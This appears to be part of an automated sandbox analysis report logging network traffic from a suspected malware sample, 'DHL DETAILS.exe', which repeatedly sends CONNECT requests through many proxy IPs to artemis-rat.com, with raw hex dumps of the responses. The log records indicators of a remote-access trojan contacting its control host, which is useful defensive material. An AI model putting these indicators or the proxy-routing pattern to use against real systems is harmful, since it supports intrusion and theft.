                                                                                    Mar 9, 2024 13:14:13.624159098 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    354192.168.2.551181184.60.66.122806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469687939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.706624031 CET1286INHTTP/1.1 302 Found
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Location: https://artemis-rat.com:443/index.php
                                                                                    Content-Length: 3214
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 50 20 43 6f 6d 70 75 74 69 6e 67 20 43 6f 6e 63 65 70 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6c 69 62 2f 64 70 63 63 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 55 62 75 6e 74 75 3a 34 30 30 2c 33 30 30 2c 37 30 30 2c 35 30 30 2c 34 30 30 69 74 61 6c 69 63 25 37 63 44 69 64 61 63 74 2b 47 6f 74 68 69 63 3a 73 75 62 73 65 74 3d 6c 61 74 69 6e 2d 65 78 74 25 37 63 4d 75 6c 69 3a 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 33 30 30 69 74 61 6c 69 63 2c 33 30 30 25 37 63 41 6d 69 6b 6f 3a 34 30 30 2c 37 30 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 42 6d 45 34 6b 57 42 71 37 38 69 59 68 46 6c 64 76 4b 75 68 66 54 41 55 36 61 75 55 38 74 54 39 34 57 72 48 66 74 6a 44 62 72 43 45 58 53 55 31 6f 42 6f 71 79 6c 32 51 76 5a 36 6a 49 57 33 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 6b 61 37 53 6b 30 47 6c 6e 34 67 6d 74 7a 32 4d 6c 51 6e 69 6b 54 31 77 58 67 59 73 4f 67 2b 4f 4d 68 75 50 2b 49 6c 52 48 39 73 45 4e 42 4f 30 4c 52 6e 35 71 2b 38 6e 62 54 6f 76 34 2b 31 70 22 0d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="MobileOptimized" content="width"/> <meta name="HandheldFriendly" content="true"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon"/> <title>DP Computing Concepts</title> <link rel="stylesheet" href="/lib/dpcc.css"> <link href="https://fonts.googleapis.com/css?family=Ubuntu:400,300,700,500,400italic%7cDidact+Gothic:subset=latin-ext%7cMuli:400,400italic,300italic,300%7cAmiko:400,700" media="all" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"></head><body> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
                                                                                    Mar 9, 2024 13:14:13.706799984 CET1286INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67
                                                                                    Data Ascii: crossorigin="anonymous"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><header> <div class="row mt-2"> <div class="col-sm-auto"> <a href="http:
                                                                                    Mar 9, 2024 13:14:13.708079100 CET844INData Raw: 69 6e 67 20 62 61 73 69 63 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 63 6f 6e 64 69 74 69 6f 6e 73 20 66 6f 72 20 67 72 6f 77 69 6e 67 20 0d 0a 20 61 67 72 69 63 75 6c 74 75 72 61 6c 20 70 72 6f 64 75 63 74 73 20 73 75 63 68 20 61 73 20 67 72
                                                                                    Data Ascii: ing basic environmental conditions for growing agricultural products such as grapes. These sensors are capable of remotely monitoring temperature, humidity, light levels, and soil moisture levels. The sensor readings are transmitted wire


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    355192.168.2.551054104.249.29.7457676352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469767094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.943782091 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    356192.168.2.54996092.205.110.11878956352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469831944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    357192.168.2.551267172.67.182.22806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469871044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.624119043 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    358192.168.2.5510028.222.152.158555556352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.473535061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.161231995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    359192.168.2.55106118.185.169.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.479291916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.783744097 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    360192.168.2.551196162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.482276917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    361192.168.2.55103143.155.130.182156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.487087965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    362192.168.2.550911103.190.54.141806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.495651960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.161726952 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:17.200654030 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 97 c2 51 8b 25 55 b1 dd 26 aa c3 c8 d4 ce 9f 87 eb 89 9e 85 51 71 f8 25 bd f2 a7 b2 d8 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRQ%U&Qq%*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:17.945190907 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 99 b9 8d fc 22 e8 a9 c3 75 b3 c8 1f b5 63 fa df 55 a7 2e a3 f0 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eR"ucU.DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:17.945322990 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                    Mar 9, 2024 13:14:17.945364952 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                    Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                    Mar 9, 2024 13:14:18.359647989 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                    Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                    Mar 9, 2024 13:14:18.429214954 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 18 73 d2 8e 88 07 79 95 ca 2e a8 d6 a6 ed 6f 6b 8a ae 87 dc 49 29 36 af 10 a7 a6 63 83 3e 31 7b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f1 76 ed da 82 75 6f 69 59 34 50 08 d1 64 50 70 bb 30 6a ac 69
                                                                                    Data Ascii: %! sy.okI)6c>1{(vuoiY4PdPp0ji89
                                                                                    Mar 9, 2024 13:14:18.920175076 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 5a 17 6c fc 96 79 f4 13 45 84 8d 90 63 af ff 94 81 b1 16 65 16 d3 bb 36 46 a1 28 87 f2 1a 3b 6d ce b0 60 5b 60 5a a9 4a f1 d2 23 f2 2f ea 69 1c 39 24 69 50 1f 61 53 11 af a3 6c 2e 37 58 3d 12 ef b0 3d
                                                                                    Data Ascii: ZlyEce6F(;m`[`ZJ#/i9$iPaSl.7X== Ry7&_twEU]K-1=E'|7%A (uAn%YqB2#*?%{P-g\/t,Np-{xh_f(I@GV
                                                                                    Mar 9, 2024 13:14:18.963643074 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 da ef ca 2e 3e 09 f5 a6 26 22 c2 9d 8b a8 23 52 bd 92 e0 c2 88 a7 ae 6e 6e 09 8b 6c 4a 9c a4 c8 32 27 be a6 f3 d4 6b 7a 69 e7 c0 b0 47 a4 8d 28 70 11 8a e6 67 7e 1a 8f b8 2e b7 5f 1e 4c 4a c3 aa 32 ae 98 78
                                                                                    Data Ascii: .>&"#RnnlJ2'kziG(pg~._LJ2x(`wE3]qW2iZv4[z-Wd5AN'p=]:a5,eZjX[X3?*ETgTB<svmKObI
                                                                                    Mar 9, 2024 13:14:19.460541964 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 93 d5 bc 33 23 d1 68 c3 d9 0b 38 9c b3 e6 ff a3 b9 76 3e 8b c2 cd 55 ea 39 c1 b5 36 71 fc 7c 86 fb b6 e3 38 f6 2e 61 fd c2 ed 6e 0d ea 80 04 64 d3 ad 22 1f 7b dd 46 64 13 d6 b6 a6 d6 2e 1f 3b 43 06 9d 84 ca
                                                                                    Data Ascii: q3#h8v>U96q|8.and"{Fd.;C%Q(Na,>5z9~q[c|eR5HY7{eIqRB?k3;2&N`#FE2E0@uk4+-?~5oQ5
                                                                                    Mar 9, 2024 13:14:19.460551023 CET112INData Raw: 49 0d 4f 06 a3 c6 b5 21 99 03 b2 7e ae db d4 69 09 74 73 b2 dd aa 1a 88 d6 10 e9 d7 52 79 b7 39 1d b6 20 c8 ae 93 ad ed 36 e5 b5 bc 1b 75 ae 3e f7 5f 6a 53 c1 b3 94 81 43 27 12 d3 ad 59 56 16 e8 af b5 d1 e5 3e 4b 0f 02 4a 2f 8a dd f2 4a 6e 52 a0
                                                                                    Data Ascii: IO!~itsRy9 6u>_jSC'YV>KJ/JnR0s;b'l`Q.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    363192.168.2.55100193.90.212.241536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.496090889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    364192.168.2.549949171.250.222.1310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.503602028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536439896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    365192.168.2.551060148.66.130.18756306352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.511801004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.208056927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.208090067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.270831108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.364667892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.380029917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.380387068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366404057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    366192.168.2.54997834.95.243.12280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.511892080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.567646027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    367192.168.2.54999092.205.61.38486646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.512972116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


